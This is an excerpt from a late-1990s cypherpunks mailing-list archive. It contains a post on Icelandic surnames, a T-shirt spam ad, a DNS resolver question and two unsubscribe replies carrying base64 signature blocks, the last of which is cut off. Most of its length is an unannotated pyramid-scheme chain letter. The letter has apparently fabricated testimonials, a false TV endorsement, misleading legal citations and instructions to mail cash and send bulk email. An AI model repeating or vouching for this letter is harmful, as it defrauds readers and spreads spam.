Date: Fri, 1 Jan 1999 11:56:56 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Norway - go to jail for naming baby illegal [CNN]
In-Reply-To: <D104150098E6D111B7830000F8D90AE84DDFDB@exna02.securitydynamics.com>
Message-ID: <v04020a0fb2b1f0af3fdd@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Icelandic last names, and old Norse last names in general, change,
algorithimically, every generation.

Your "last" name, if male, is your father's first name with "son" after it.

If you're female it's your mother's first name, with, I believe "dottir"
(daughter) after it.

So, if your parents are Eric (say :-)), and, um, Helga, and you're male and
your name is Lief, your name would be (oddly enough) Lief Ericsson.

If you're female, and your name is, oh, Greta, (I don't know many female Norse
names, and that's probably not one, Miss Garbo to the contrary) then your name
would be Greta Helgasdottir, or something like that.

Icelanders on the list will correct the specifics, of course. The price of
error is bandwidth, and all that, but you get the idea.

So, no matter who your are, if you're to become an Icelandic citizen, your
last name changes.

Mine, since my family's Fresian, would change from "Hettinga" ("guy who lives
on a hill", which almost everyone did, or they lived in a swamp :-)), to
"Ralphson", which, fortunately, is almost passable Icelandic. Actually,
Frisians, the bad guys in Beowulf, could almost pass for Norse in general, as
anyone who's met me might testify.

Think of it as an anonymous renamer?

:-).


Cheers,
Robert Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNoxD0MUCGwxmWcHhAQG3SQf/dpUEFsoxvfkwROqxnig9qR7+k73AFTR+
8pXtRfxwUjpDjO72xmHOUerC9xdHBjG2pYJKcsuq13iq+DNlYRTuOIBvWf4EJd0d
G82aTtlAvS5KwmTGyTzJPepVlXuaX+Aimb3aBEUYwZrssLbaCAMgtv+GEf6f1URy
vifxjZHYa/+2Vi/VOQzLIuzpBjs2NFmSgU4vqdz6hKBPM7KHQiedIcvC/aUxonLH
wqNqOtQJuwwuPUcxJElh1rj+9xlhqT2DiLQe3cq3p/JYCr3NR3seqk6OqNs4pCVp
5aww4TaiEvGips+rFvPcQPLHDdfTY+z8fw39m9s2rGlJ4I7LYu570w==
=M3Rr
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: print4ever@micronet.net
Date: Sat, 6 Feb 1999 23:02:48 +0800
To: <cypherpunks@toad.com>
Subject: AD:Family Reunion T Shirts & More
Message-ID: <199902061406.GAA13110@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Message sent by:  Kuppler Graphics, 32 West Main Street, Maple Shade, New Jersey, 08052,
1-800-810-4330. This is a one time mailing.  This list will NOT be sold.  All addresses 
are automatically added to our remove list.

Hello.  My name is Bill from Kuppler Graphics.  We do screenprinting on T Shirts, Sweatshirts,
Jackets, Hats, Tote Bags and more!

Do you or someone you know have a Family Reunion coming up?  Kuppler Graphics would like to
provide you with some great looking T Shirts for your Reunion.

Kuppler Graphics can also provide you with custom T's and promotional items such as imprinted
magnets, keychains, pens, mugs, hats, etc. for your business or any fundraising activity
(church, school, business etc.)  

We are a family owned company with over 15 years of experience.  

All work is done at this location.  No middle man.  Our prices are great!

Please click reply to email us to receive more info or call 1-800-810-4330
Thanks for your interest

Bill
Kuppler Graphics
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jose <jfreyre@uni.edu.pe>
Date: Thu, 22 Apr 1999 06:47:05 +0800
To: cypherpunks@toad.com
Subject: Re: DNS queries
In-Reply-To: <371DEFA3.D99C62DE@uni.edu.pe>
Message-ID: <368BF73F.1E39D1A5@uni.edu.pe>
MIME-Version: 1.0
Content-Type: text/plain





Thanx 4 da help, but it isnt the answer to ma question.

I tray to know, ..... All the pc's on Internet use a server (Remote o
local ; named ,etc ) that resolve the queries 4 non ip's domains, like
www.microsoft.com

4 example    200.37.129.2 ---- use 207.17.220.2 to resolve the queries
(of the domains ) in internet.

I like to know if there be a program that say me Remotly that
200.37.129.2 use 207.17.220.2 to resolve the domain ( 4 da Internet )
queries.

Best wishes

Jose A. Freyre

Security Admin - UNI - Networks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinjac@usa.net
Date: Mon, 30 Nov 1998 07:52:01 -0800 (PST)
To: vinjac@usa.net
Subject: Tired of the Rat Race? Read and Build Wealth!!
Message-ID: <199811301544.AAA22752@aics.co.jp>
MIME-Version: 1.0
Content-Type: text/plain



THIS IS IT FOLKS!! 

This is THE LETTER you've been READING about 
in the NEWS lately.

Due to the popularity of this letter on the 
Internet, a major nightly news program recently 
devoted an entire show to the investigation of 
the program described below, to see if it really 
can make people money.  If you saw it, you know 
that their conclusion was that while most people 
did not make the $55,000, as discussed in the plan, 
EVERYONE who followed the instructions was able to 
make 100 to 160 times their money at the VERY LEAST.  
The show also investigated whether or not the 
program was legal.  Their findings proved once and 
for all that there are absolutely no laws prohibiting 
the participation in the program.   "This is one of 
the most exciting opportunities with the MOST income 
potential on the internet today!" --48 Hours.

Hi, my name is Susan.  After I saw this letter aired 
on the news program, I decided to get some of my 
skeptical questions answered.

Question #1 - Does it really work?  Until I try it, 
I can only go on the testimony of people I don't know, 
so I will only know if I try it.  I've never done 
this type of thing, but I decided it was time to try 
something.  If I keep doing what I am doing I'll keep 
getting what I've got.  Besides, people 70 years old 
have been surveyed and they have consistently said 
that the 2 regrets they have had in their lives were 
that;

	1) They wish they had spent more time with 
	their families and
	2) They wish they had taken more chances

Upon hearing this again, and hearing what the MEDIA 
said about it, I decided that at 42, I was going to 
take a small chance and see what would come of it.

Question #2 - Is it legal? - Yes, (Refer to title 18, 
Section 1302 & 1342 of the U.S. Postal and Lottery 
Laws) This opportunity isn't much of a risk and could 
turn out to actually be a bit of fun. 

Bottom Line;
The risk is only $20 and time on the Internet.
The following is a copy of the letter that the media 
was referring to:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 

This is a LEGAL, MONEYMAKING PHENOMENON.
PRINT this letter, READ the directions, THEN READ IT 
AGAIN !!!

You are about to embark on the most profitable and 
unique program you may ever see!  Many times over, 
it has demonstrated and proven its ability to 
generate large amounts of cash!  This program is 
showing fantastic appeal with a huge and ever-growing 
on-line population desirous of additional income.
           
This is a legitimate, LEGAL, moneymaking opportunity.  
It does not require you to come in personal contact 
with people, do any hard work, and best of all, you 
never have to leave the house, except to get the mail 
and go to the bank!          
      
This truly is that lucky break you've been waiting 
for!  Simply follow the easy instructions in this 
letter, and your financial dreams can come true!  
When followed correctly, this electronic, multi-
level marketing program WORKS!
               
Thousands of people have used this program to: 
	- Raise capital to start their own businesses
	- Pay off debts
	- Buy homes, cars, etc.,
	- Even retire!

This is your chance, Don't pass it up!

----------------------------------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY

ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------------------

Basically, this is what we do:  
We send thousands of people a product that they 
paid us $5.00 US for, that costs next to nothing 
to produce and e-mail back to them. As with all 
multi-level businesses, we build our business by 
recruiting new partners and selling our products.  
Every state in the U.S. allows you to recruit new 
multi-level business online (via your computer).

The products in this program are a series of four 
business and financial reports costing $5.00 each.  
Each order you receive is to include:

	* $5.00 cash United States Currency

	* The name and number of the report they are 
	ordering

	* The e-mail address where you will e-mail 
	them the report they ordered.
        
To fill each order, you simply e-mail the product to 
the buyer.  THAT'S IT!  The $5.00 is yours!  This is 
the EASIEST electronic multi-level marketing business 
anywhere!


FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

+++++++++ I  N  S  T  R  U  C  T  I  O  N  S +++++++++
             
This is what you MUST do:

1. Order all 4 reports shown on the list below 
(you can't sell them if you don't order them).

*  For each report, send $5.00 CASH, the NAME & 
NUMBER OF THE REPORT YOU ARE ORDERING, YOUR E-MAIL 
ADDRESS, and YOUR RETURN POSTAL ADDRESS (in case of 
a problem) to the person whose name appears on the 
list next to the report.

*  When you place your order, make sure you order 
each of the four reports.  You will need all four 
reports so that you can save them on your computer 
and resell them.

*  Within a few days you are to receive, via e-mail, 
each of the four reports.  Save them on your computer 
so they will be accessible for you to send to the 
1,000's of people who will order them from you.

2. IMPORTANT-- DO NOT alter the names of the people 
who are listed next to each report, or their sequence 
on the list, in any way other than is instructed 
below in steps "a" through "d" or you will lose out 
on the majority of your profits.   Once you understand 
the way this works, you'll also see how it doesn't 
work if you change it.  Remember that this method has 
been tested, and if you alter it, it will not work.    

a.  Look below for the listing of available reports.        
        
b.  After you've ordered the four reports, replace 
the name and address under REPORT #1 with your name 
and address, moving the one that was there down to 
REPORT #2.          

c.  Move the name and address that was under REPORT 
#2 down to REPORT #3.
  
d.  Move the name and address that was under REPORT 
#3 down to REPORT#4.
               
e.  The name and address that was under REPORT #4 
is removed from the list and has NO DOUBT collected 
large sums of cash!   
Please make sure you copy everyone's name and address 
ACCURATELY!!!

3.  Take this entire letter, including the modified 
list of names, and save  it to your computer.  Make 
NO changes to the instruction portion of this letter.       
        
4.  Now you're ready to start an advertising campaign 
on the WORLDWIDE WEB!  Advertising on the WEB can be 
very, very inexpensive, and there are HUNDREDS of 
FREE places to advertise. Another avenue, which you 
could use for advertising, is e-mail lists. You can 
buy these lists for under $20/2,000 addresses or you 
can pay someone to take care of it for you.  BE SURE 
TO START YOUR AD CAMPAIGN IMMEDIATELY!
        
5.  For every $5.00 you receive, all you must do is 
e-mail them the report they ordered.  THAT'S IT!  
ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS! This 
will help guarantee that the e-mail THEY send out, 
with YOUR name and address on it, will be prompt 
because they can't advertise until they receive the 
report!  To grow fast be prompt and courteous.  

--------------------------------------
AVAILABLE REPORTS     
*Order Each REPORT by NUMBER and NAME*
   
Notes:        
-  ALWAYS SEND $5 CASH FOR EACH REPORT         
-  ALWAYS SEND YOUR ORDER VIA THE QUICKEST DELIVERY        
-  Make sure the cash is concealed by wrapping it 
   in at least two sheets of paper          
-  On one of those sheets of paper, include: (a) the 
number & name of the report you are ordering, (b) 
your e-mail address, and (c) your postal address.        
_________________________________________________________________        

REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL 
SALES"      
ORDER REPORT #1 FROM:          
            Inter-Line Systems
            PO Box 175
            Milford, NJ 08848
_________________________________________________________________        

REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"   
ORDER REPORT #2 FROM:        
            Galactic Whispers
            PO Box 291
            Pittstown, NJ 08867
_________________________________________________________________        

REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"      
ORDER REPORT #3 FROM:        
            DEM
            3 Tallyho Lane
            Bow, NH 03304
 
_________________________________________________________________        

REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"    
ORDER REPORT #4 FROM:        
            INFO-MEDIA PUBLICATIONS
            100 E. WHITESTONE BLVD.  SUITE 148-133      
            CEDAR PARK,  TEXAS 78613 
_____________________________________________________        

  ----------------------------------------------------
  HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
  ----------------------------------------------------
  
Let's say you decide to start small just to see how 
well it works.  Assume your goal is to get 10 people 
to participate on your first level.  (Placing a lot 
of FREE ads on the internet will EASILY get a larger 
response.)  Also assume that everyone else in YOUR 
ORGANIZATION gets ONLY 10 downline members.  Follow 
this example to achieve the STAGGERING results below.        
        
1st level--your 10 members with $5.............$50        

2nd level--10 members from those 10 
($5 x 100).....................................$500        

3rd level--10 members from those 100 
($5 x 1,000)...................................$5,000        

4th level--10 members from those 1,000 
($5 x 10,000)..................................$50,000        

THIS TOTALS ---------------------------------->$55,550

Remember friends, this assumes that the people who 
participate only recruit 10 people each.  Think for 
a moment what would happen if they got 20 people to 
participate!  Lots of people get 100s of participants!  
THINK ABOUT IT!      

Your cost to participate in this is practically 
nothing (surely you can afford $20).  You obviously 
already have an internet connection and e-mail is 
FREE!!!  REPORT#3 shows you the most productive 
methods for bulk e-mailing and purchasing e-mail 
lists.  Some list & bulk e-mail vendors even work 
on trade! 
 
About 50,000 new people get online every month

****TIPS FOR SUCCESS**** 
    
 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, 
    professional, and follow the directions accurately.
 *  Send for the four reports IMMEDIATELY so you will 
    have them when the orders start coming in because:      
    When you receive a $5 order, you MUST send out the 
    requested product/report to comply with the U.S. 
    Postal & Lottery Laws, Title 18,Sections 1302 and 
    1341 or Title 18, Section 3005 in the U.S. Code 
    also Code of Federal Regs. vol. 16, Sections 255 
    and 436, which state that "a product or service 
    must be exchanged for money received." 

 *ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU 
  RECEIVE.

 *  Be patient and persistent with this program. If 
    you follow the instructions exactly, the results 
    WILL undoubtedly be SUCCESSFUL!        

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU 
    WILL SUCCEED!

    ************YOUR SUCCESS GUIDELINE************
  
Follow these guidelines to help assure your success:

If you don't receive 10 to 20 orders for REPORT #1 
within two weeks, continue advertising until you do.  
Then, a couple of weeks later you should receive at 
least 50 orders for REPORT #2.  If you don't, 
continue advertising until you do.  Once you have 
received 50 or more orders for REPORT #2, YOU CAN 
RELAX, because the system is already working for you, 
and the cash can continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you 
are placed in front of a DIFFERENT report.  You can 
KEEP TRACK of your PROGRESS by watching which report 
people are ordering from you.  If you want to 
generate more income, send another batch of e-mails 
and start the whole process again!  There is no limit 
to the income you will generate from this business!        
        
NOTE:  If you need help with starting a business, 
registering a business name,  how income tax is 
handled, etc., contact your local office of the 
Small Business Administration (a Federal agency) for 
free help and answers to questions.  Also, the 
Internal Revenue Service offers free help via 
telephone and free seminars about business taxes.   
If you have any question of the legality of this 
letter contact the Office of Associate Director for 
Marketing Practices Federal Trade Commission Bureau 
of Consumer Protection in Washington DC.
     
**T  E  S  T  I  M  O  N  I  A  L  S**

This program does work, but you must follow it EXACTLY!
Especially the rule of not trying to place your name 
in a different position, it won't work and you'll lose 
a lot of potential income.  I'm living proof that it 
works.  It really is a great opportunity to make 
relatively easy money, with little cost to you.  If you 
do choose to participate, follow the program exactly, 
and you'll be on your way to financial security.
Sean McLaughlin, Jackson, MS      

The main reason for this letter is to convince you 
that this system is honest, lawful, extremely 
profitable, and is a way to get a large amount of 
money in a short time.  I was approached several 
times before I checked this out.  I joined just to 
see what one could expect in return for the minimal 
effort and money required.  To my astonishment, I 
received $36,470.00 in the first 19 weeks, with money 
still coming in.
Phillip A. Brown, Esq.              

I had received this program before. I deleted it, but 
later I wondered if I shouldn't have given it a try. 
Of course, I had no idea who to contact to get another 
copy, so I had to wait until I was e-mailed another 
program...11 months passed then it came...I didn't 
delete this one!...I made more than $41,000 on the 
first try!!
D. Wilburn, Muncie, IN        

This is my third time to participate in this plan. 
We have quit our jobs, and will soon buy a home on 
the beach and live off the interest on our money.  
The only way on earth that this plan will work for 
you is if you do it. For your sake, and for your 
family's sake don't pass up this golden opportunity.  
Good luck and happy spending!
Charles Fairchild, Spokane, WA  

I am nearing the $90,000 mark from this program.  I 
have used several forms of advertisement.  I used 
regular mail and bulk e-mail.  The regular mail that 
I used was very expensive for two reasons. I purchased 
a very select list of names and the postage. The third 
time I sent e-mails out, I did so in the quantity of 
1 million. So, after 3 times participating in this 
program I am almost at the $90,000 mark. That isn't 
too bad. I hope the same success for you.
Raymond McCormick, New Cannan, Ct. 

You have great potential for extra earnings that is 
available at your fingertips!  You have unlimited 
access to wealth, but you must be willing to take 
that first step!  The Media ALREADY PROVED That !!!!

You could be making an obscene amount of money!  I 
have given you the information, materials, and 
opportunity to become financially better off. IT IS 
UP TO YOU NOW!- THINK ABOUT IT - Your risk is only 
$20.? HOW MUCH DO YOU SPEND ON LOTTO TICKETS- for NO 
RETURN?

ORDER YOUR REPORTS TODAY
AND GET STARTED ON YOUR ROAD
TO FINANCIAL FREEDOM!!!









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: falcon falcon <falconinc@earthlink.net>
Date: Tue, 1 Dec 1998 08:18:32 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Re: bonjour
In-Reply-To: <v04102f00b289c49f3cff@[193.57.162.39]>
Message-ID: <366416FB.1ADD27A6@earthlink.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3999.1071713824.multipart/signed"

--Boundary..3999.1071713824.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

please remove my name from your email list.

Thierry Roch wrote:

> Ici tout va bien, merci.
>
> On espre qu'une version fiable pour windows sortira un jour
> Salut
> ________________________________________
> roch@liberation.fr
> Tel : +33 (0) 1 42 76 17 68 - Fax: +33 (0) 1 42 76 02 24
> Informatique Libration http://www.liberation.fr




--Boundary..3999.1071713824.multipart/signed
Content-Type: application/octet-stream; name="bin00002.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00002.bin"
Content-Description: "S/MIME Cryptographic Signature"

MIIKmgYJKoZIhvcNAQcCoIIKizCCCocCAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCJIwggPcMIIDRaADAgECAhAJwcQoRxV7uRqtWA/aleFPMA0G
CSqGSIb3DQEBBAUAMGIxETAPBgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5W
ZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNpZ24gQ2xhc3MgMSBDQSAt
IEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODAzMDkwMDAwMDBaFw05OTAz
MDkyMzU5NTlaMIIBHzERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0g
SW5kaXZpZHVhbCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24u
Y29tL3JlcG9zaXRvcnkvQ1BTIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChj
KTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBOZXRzY2FwZSBG
dWxsIFNlcnZpY2UxFjAUBgNVBAMTDURhdmlkIFdhbGxhY2UxJjAkBgkqhkiG
9w0BCQEWF2ZhbGNvbmluY0BlYXJ0aGxpbmsubmV0MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHI8H39EsMGyPI723JFjbKbLv2oGvzS8w9MjLQFKcp
P7CtfGeBKePW5X4kwAl8HgEnMuQ1Bmjf3qBk6bV4UE25akDg1H6Cxchr8Qqd
D8LWN0tTKZYoDWVP9upJRLqu29g1Z7ghMU/0DmPvXNNXELTFcIabeW7I7wjN
gQkiDUwFZwIDAQABo4HTMIHQMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAG
C2CGSAGG+EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlz
aWduLmNvbS9DUFMwYgYIKwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjAD
AgEBGj1WZXJpU2lnbidzIENQUyBpbmNvcnAuIGJ5IHJlZmVyZW5jZSBsaWFi
LiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCGSAGG+EIBAQQEAwIH
gDANBgkqhkiG9w0BAQQFAAOBgQA0UNlACbtKUQl/LE/fTo5i7EoDmNWId/za
tBau0Qbwe1RYE/d/0QPSHx8vaQb8wDSQeidR89jpUj9zco4CqLS6kDvmPAq5
GM8ifaxHvxWCsSzZH379kVNMl7nCEhIZS3KwRY7ZF0ZBnBNsha+gv1t66PiV
dXPIIGbVEnlz//yIHTCCAnkwggHioAMCAQICEFIfNR3ycH4AK77KWYcE1Tkw
DQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTk2MDYyNzAwMDAwMFoXDTk5MDYy
NzIzNTk1OVowYjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5k
aXZpZHVhbCBTdWJzY3JpYmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC2FKbPTdAFDdjKI9BvqrQpkmOOLPhvltcunXZLEbE2jVfJw/0cxrr+Hgi6
M8qV6r7jW80GqLd5HUQq7XPysVKDaBBwZJHXPmv5912dFEObbpdFmIFH0S3L
3bty10w/cariQPJUObwW7s987LrbP2wqsxaxhhKdrpM01bjV0Pc+qQIDAQAB
ozMwMTAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjARBglghkgBhvhC
AQEEBAMCAQYwDQYJKoZIhvcNAQECBQADgYEAwfr3AudXyhF1xpwM+it3T4dF
Fzvj0sHaD1g5jq6VmQOhqKE4/nmakxcLl4Y5x8poNGa7x4hF9sgMBe6+lyXv
4NRu5H+ddlzOfboUoq4Ln/tnW0ilZyWvGWSI9nLYKSeqNxJqsSivJ4MYZWyN
7UCeTcR4qIbs6SxQv6b5DduwpkowggIxMIIBmgIFAqQAAAEwDQYJKoZIhvcN
AQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMu
MTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRp
b24gQXV0aG9yaXR5MB4XDTk2MDEyOTAwMDAwMFoXDTk5MTIzMTIzNTk1OVow
XzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTcwNQYD
VQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0
aG9yaXR5MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDlGb9to1ZhLZlI
cfZn3rmN67eehoAKkQ76OCWvRoiC5XOooJskXQ0fzGVuDLDQVoQYh5oGmxCh
c9+0WDlrbsH2FdWoqD+qEgaNMax/sDTXjzRniAnNFBHiTkVWaR94AoDa3EeR
Kbs2yWNcxeDXLYd7obcysHswuiovMaruo2fa2wIDAQABMA0GCSqGSIb3DQEB
AgUAA4GBAFJzuppV3Nw/gn2wkJhiKoJMdgBuJT3VwglwVwEMD3cfGKH7HGAO
oHU7SSFB/qdcLUxCSdP/KNiM6p3+yQfid4JTI95V885Ek/r6TL3KNvNbZrKe
yPIMXl7UobQhCTPKO1n8ksI4/K3ZliTgLfqjKfUzaHhOtLyfaTXiqJiUczvE
MYIB0DCCAcwCAQEwdjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMO
VmVyaVNpZ24sIEluYy4xNDAyBgNVBAsTK1ZlcmlTaWduIENsYXNzIDEgQ0Eg
LSBJbmRpdmlkdWFsIFN1YnNjcmliZXICEAnBxChHFXu5Gq1YD9qV4U8wCQYF
Kw4DAhoFAKCBsTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw05ODEyMDExNjE5MDlaMCMGCSqGSIb3DQEJBDEWBBTrtBfCUbNA
lhr+eMNkWqyT+6rePDBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBQDANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgIlYgn4HB/8DG23wFIQaEZBHgRvg
pAUqr5SH9BmYFec8hL+hZNGeMdVBlrcXOOKnIwQMcMI3ZC7DYP4P6wfFxyGE
IHqMP05OduRVUcc8/GfivfizJq32DjjlzLfBb0KkKch5L8EeuTBC7huexPWD
LD9lQdBlzL8POSEOee2zas2y
--Boundary..3999.1071713824.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: falcon falcon <falconinc@earthlink.net>
Date: Tue, 1 Dec 1998 08:20:20 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE SECURE VPN S...
In-Reply-To: <83cc5099.3664104d@aol.com>
Message-ID: <3664173D.B800682E@earthlink.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3999.1071713824.multipart/signed"
Content-Length: 4240
Lines: 89

--Boundary..3999.1071713824.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Please remove my name from your email list.


Opencity@aol.com wrote:

> Hi Mimmi
>
> Okay...this can be distributed as of today?
>
> Thanks
> phil




--Boundary..3999.1071713824.multipart/signed
Content-Type: application/octet-stream; name="bin00003.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00003.bin"
Content-Description: "S/MIME Cryptographic Signature"

MIIKmgYJKoZIhvcNAQcCoIIKizCCCocCAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCJIwggPcMIIDRaADAgECAhAJwcQoRxV7uRqtWA/aleFPMA0G
CSqGSIb3DQEBBAUAMGIxETAPBgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5W
ZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNpZ24gQ2xhc3MgMSBDQSAt
IEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODAzMDkwMDAwMDBaFw05OTAz
MDkyMzU5NTlaMIIBHzERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0g
SW5kaXZpZHVhbCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24u
Y29tL3JlcG9zaXRvcnkvQ1BTIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChj
KTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBOZXRzY2FwZSBG
dWxsIFNlcnZpY2UxFjAUBgNVBAMTDURhdmlkIFdhbGxhY2UxJjAkBgkqhkiG
9w0BCQEWF2ZhbGNvbmluY0BlYXJ0aGxpbmsubmV0MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHI8H39EsMGyPI723JFjbKbLv2oGvzS8w9MjLQFKcp
P7CtfGeBKePW5X4kwAl8HgEnMuQ1Bmjf3qBk6bV4UE25akDg1H6Cxchr8Qqd
D8LWN0tTKZYoDWVP9upJRLqu29g1Z7ghMU/0DmPvXNNXELTFcIabeW7I7wjN
gQkiDUwFZwIDAQABo4HTMIHQMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAG
C2CGSAGG+EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlz
aWduLmNvbS9DUFMwYgYIKwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjAD
AgEBGj1WZXJpU2lnbidzIENQUyBpbmNvcnAuIGJ5IHJlZmVyZW5jZSBsaWFi
LiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCGSAGG+EIBAQQEAwIH
gDANBgkqhkiG9w0BAQQFAAOBgQA0UNlACbtKUQl/LE/fTo5i7EoDmNWId/za
tBau0Qbwe1RYE/d/0QPSHx8vaQb8wDSQeidR89jpUj9zco4CqLS6kDvmPAq5
GM8ifaxHvxWCsSzZH379kVNMl7nCEhIZS3KwRY7ZF0ZBnBNsha+gv1t66PiV
dXPIIGbVEnlz//yIHTCCAnkwggHioAMCAQICEFIfNR3ycH4AK77KWYcE1Tkw
DQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTk2MDYyNzAwMDAwMFoXDTk5MDYy
NzIzNTk1OVowYjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5k
aXZpZHVhbCBTdWJzY3JpYmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC2FKbPTdAFDdjKI9BvqrQpkmOOLPhvltcunXZLEbE2jVfJw/0cxrr+Hgi6
M8qV6r7jW80GqLd5HUQq7XPysVKDaBBwZJHXPmv5912dFEObbpdFmIFH0S3L
3bty10w/cariQPJUObwW7s987LrbP2wqsxaxhhKdrpM01bjV0Pc+qQIDAQAB
ozMwMTAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjARBglghkgBhvhC
AQEEBAMCAQYwDQYJKoZIhvcNAQECBQADgYEAwfr3AudXyhF1xpwM+it3T4dF
Fzvj0sHaD1g5jq6VmQOhqKE4/nmakxcLl4Y5x8poNGa7x4hF9sgMBe6+lyXv
4NRu5H+ddlzOfboUoq4Ln/tnW0ilZyWvGWSI9nLYKSeqNxJqsSivJ4MYZWyN
